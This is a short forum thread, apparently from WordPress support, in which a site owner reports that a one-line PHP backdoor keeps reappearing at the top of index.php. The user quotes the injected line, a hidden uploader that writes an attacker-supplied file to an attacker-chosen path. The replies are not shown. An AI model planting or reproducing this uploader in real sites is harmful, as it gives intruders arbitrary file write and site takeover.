Random $_FILES['F1l3'] Code
-
I have a website where, every now and then the index.php file in the root directory gets modified and the following line of code gets added at the very top:
if ($_FILES['F1l3']) {move_uploaded_file($_FILES['F1l3']['tmp_name'], $_POST['Name']); echo 'OK'; Exit;}
This line of code then appears at the top of the live website, which I have to keep going in and deleting. I did a Google search but all I could find were dozens of other websites with the same problem. Does anyone know what this is and why it continues to appear in the index file?
I am using the theme Terso, FYI.
Viewing 15 replies - 1 through 15 (of 15 total)
Viewing 15 replies - 1 through 15 (of 15 total)
- The topic ‘Random $_FILES['F1l3'] Code’ is closed to new replies.